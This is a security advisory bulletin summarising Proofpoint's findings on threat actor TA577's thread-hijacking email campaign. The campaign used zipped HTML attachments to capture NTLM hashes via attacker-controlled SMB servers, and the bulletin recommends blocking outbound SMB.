Summary:
Proofpoint cybersecurity researchers have uncovered a new tactic employed by cybercriminal threat actor TA577, revealing a previously unseen objective in their operations. The group was found using an attack chain aimed at stealing NT LAN manager (NTLM) authentication information, which could potentially be used for sensitive data gathering and further malicious activities.

In their analysis published recently, the Proofpoint team identified two campaigns conducted by TA577 in the month of February, using this technique. This campaign targeted hundreds of organizations globally, sending out tens of thousands of messages. The messages were designed to appear as replies to previous emails, employing a tactic known as thread hijacking, and contained zipped HTML attachments. Each attachment had a unique file hash, and the HTML files within were customized to specific recipients. Upon opening, these files attempted to connect to an external SMB server controlled by the threat actor, aiming to capture NTLM hashes.

Security Officer Comments:
The stolen NTLM hashes could potentially be used for password cracking to to facilitate pass the hash attacks within targeted organizations. Indicators suggest the use of the open-source toolkit Impacket on the SMB servers, a practice uncommon in standard SMB environments. The delivery method used by TA577 employing a malicious HTML file within a zip archive, is specifically designed to bypass security measures. Even disabling guest access to SMB does not mitigate the attack, as the file attempts to authenticate to the external SMB server.

Suggested Corrections:
Proofpoint warned that multiple threat actors are abusing file scheme URIs to direct recipients to external file shares like SMB and WebDAV for accessing remote content for malware delivery. Organizations are advised to block outbound SMB to prevent exploitation identified in this campaign. Additionally, Proofpoint researchers have published indicators of compromise, which can be used for detection:

https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft


Link(s):
https://www.infosecurity-magazine.com/news/ta577-exploits-ntlm-authentication/